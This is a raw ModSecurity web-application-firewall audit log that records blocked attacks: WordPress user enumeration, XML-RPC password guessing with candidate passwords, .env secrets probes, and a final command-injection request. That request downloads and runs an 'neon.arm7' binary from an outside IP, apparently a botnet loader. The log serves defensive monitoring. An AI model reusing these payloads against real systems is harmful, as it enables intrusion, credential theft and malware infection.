Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6148fe04-Z-- --d43adf1a-A-- [25/May/2025:06:53:13 +0700] aDJb6REdxfhJOSxH8A_H5gAAAFA 103.236.140.4 44432 103.236.140.4 8181 --d43adf1a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.181.59.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.181.59.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d43adf1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d43adf1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748130793453558 3524 (- - -) Stopwatch2: 1748130793453558 3524; combined=1481, p1=485, p2=964, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d43adf1a-Z-- --db578320-A-- [25/May/2025:07:08:55 +0700] aDJflxEdxfhJOSxH8A_H-gAAAFI 103.236.140.4 44716 103.236.140.4 8181 --db578320-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.254.64.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.254.64.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --db578320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db578320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748131735626801 3530 (- - -) Stopwatch2: 1748131735626801 3530; combined=1500, p1=506, p2=955, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db578320-Z-- --0992ef74-A-- [25/May/2025:07:41:25 +0700] aDJnNXawJq5017Xs8D6ZSwAAANQ 103.236.140.4 46082 103.236.140.4 8181 --0992ef74-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0992ef74-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix@123321 --0992ef74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0992ef74-E-- --0992ef74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748133685807131 6516 (- - -) Stopwatch2: 1748133685807131 6516; combined=4624, p1=538, p2=3878, p3=0, p4=0, p5=137, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0992ef74-Z-- --45852229-A-- [25/May/2025:07:47:20 +0700] aDJomNerygsLmB9N_YQo6wAAAJg 103.236.140.4 46432 103.236.140.4 8181 --45852229-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --45852229-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi2023 --45852229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45852229-E-- --45852229-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748134040403966 6605 (- - -) Stopwatch2: 1748134040403966 6605; combined=4647, p1=576, p2=3892, p3=0, p4=0, p5=106, sr=102, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45852229-Z-- --afd28c26-A-- [25/May/2025:07:51:35 +0700] aDJpl3P6UgzLD1l8HTrN8wAAABE 103.236.140.4 46538 103.236.140.4 8181 --afd28c26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.20.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.20.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --afd28c26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afd28c26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748134295933043 762 (- - -) Stopwatch2: 1748134295933043 762; combined=338, p1=302, p2=0, p3=0, p4=0, p5=36, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afd28c26-Z-- --88c24e4f-A-- [25/May/2025:08:05:53 +0700] aDJs8derygsLmB9N_YQpMgAAAII 103.236.140.4 46746 103.236.140.4 8181 --88c24e4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.79.110.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.79.110.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88c24e4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88c24e4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748135153039789 3406 (- - -) Stopwatch2: 1748135153039789 3406; combined=1522, p1=518, p2=971, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88c24e4f-Z-- --b19e5c12-A-- [25/May/2025:08:13:10 +0700] aDJupnawJq5017Xs8D6Z-QAAANY 103.236.140.4 49602 103.236.140.4 8181 --b19e5c12-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 164.90.228.79 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b19e5c12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b19e5c12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748135590265194 696 (- - -) Stopwatch2: 1748135590265194 696; combined=296, p1=258, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b19e5c12-Z-- --645ec904-A-- [25/May/2025:08:52:03 +0700] aDJ3w3awJq5017Xs8D6bbwAAAMk 103.236.140.4 54354 103.236.140.4 8181 --645ec904-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.245.28.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.245.28.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --645ec904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --645ec904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748137923229549 2175 (- - -) Stopwatch2: 1748137923229549 2175; combined=1005, p1=350, p2=628, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --645ec904-Z-- --e19d1004-A-- [25/May/2025:09:03:17 +0700] aDJ6ZderygsLmB9N_YQwSQAAAIg 103.236.140.4 49408 103.236.140.4 8181 --e19d1004-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.59.200.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.59.200.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e19d1004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e19d1004-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748138597093122 2503 (- - -) Stopwatch2: 1748138597093122 2503; combined=1421, p1=459, p2=930, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e19d1004-Z-- --e6571a39-A-- [25/May/2025:09:22:27 +0700] aDJ-43P6UgzLD1l8HTrilAAAAAc 103.236.140.4 51806 103.236.140.4 8181 --e6571a39-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 192.254.250.182 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 192.254.250.182 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e6571a39-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi& --e6571a39-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6571a39-E-- --e6571a39-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748139747192150 7017 (- - -) Stopwatch2: 1748139747192150 7017; combined=5147, p1=537, p2=4339, p3=39, p4=44, p5=112, sr=84, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6571a39-Z-- --c7705d77-A-- [25/May/2025:09:34:27 +0700] aDKBs3P6UgzLD1l8HTrrtAAAABc 103.236.140.4 60058 103.236.140.4 8181 --c7705d77-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c7705d77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7705d77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748140467040182 833 (- - -) Stopwatch2: 1748140467040182 833; combined=311, p1=276, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7705d77-Z-- --daa4ea10-A-- [25/May/2025:09:35:03 +0700] aDKB13awJq5017Xs8D66fQAAANg 103.236.140.4 33720 103.236.140.4 8181 --daa4ea10-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --daa4ea10-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix1985 --daa4ea10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daa4ea10-E-- --daa4ea10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748140503797125 4977 (- - -) Stopwatch2: 1748140503797125 4977; combined=3700, p1=485, p2=3068, p3=0, p4=0, p5=87, sr=81, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daa4ea10-Z-- --0dbcc108-A-- [25/May/2025:09:43:21 +0700] aDKDyREdxfhJOSxH8A_tVQAAAE0 103.236.140.4 45498 103.236.140.4 8181 --0dbcc108-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.57.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.57.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0dbcc108-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dbcc108-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748141001788203 3575 (- - -) Stopwatch2: 1748141001788203 3575; combined=1438, p1=463, p2=944, p3=0, p4=0, p5=31, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dbcc108-Z-- --6de3644b-A-- [25/May/2025:09:43:27 +0700] aDKDzxEdxfhJOSxH8A_tWAAAAFE 103.236.140.4 45506 103.236.140.4 8181 --6de3644b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 138.201.202.121 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 138.201.202.121 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6de3644b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi+++ --6de3644b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6de3644b-E-- --6de3644b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 138.201.202.121 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748141007789523 4649 (- - -) Stopwatch2: 1748141007789523 4649; combined=3349, p1=407, p2=2808, p3=0, p4=0, p5=79, sr=62, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6de3644b-Z-- --090dee3d-A-- [25/May/2025:09:50:33 +0700] aDKFeXP6UgzLD1l8HTruNgAAAAc 103.236.140.4 45746 103.236.140.4 8181 --090dee3d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 138.201.202.121 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 138.201.202.121 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --090dee3d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFaHmI@2020 --090dee3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --090dee3d-E-- --090dee3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 138.201.202.121 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748141433860650 6199 (- - -) Stopwatch2: 1748141433860650 6199; combined=4301, p1=580, p2=3528, p3=0, p4=0, p5=112, sr=94, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --090dee3d-Z-- --94210147-A-- [25/May/2025:09:50:34 +0700] aDKFenP6UgzLD1l8HTruNwAAABg 103.236.140.4 45748 103.236.140.4 8181 --94210147-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.189.154.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.189.154.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --94210147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94210147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748141434092354 2377 (- - -) Stopwatch2: 1748141434092354 2377; combined=1102, p1=368, p2=708, p3=0, p4=0, p5=26, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94210147-Z-- --982a164f-A-- [25/May/2025:10:32:59 +0700] aDKPa9erygsLmB9N_YRLngAAAIo 103.236.140.4 46748 103.236.140.4 8181 --982a164f-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 176.65.148.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.148.236 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --982a164f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --982a164f-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748143979653528 781 (- - -) Stopwatch2: 1748143979653528 781; combined=347, p1=315, p2=0, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
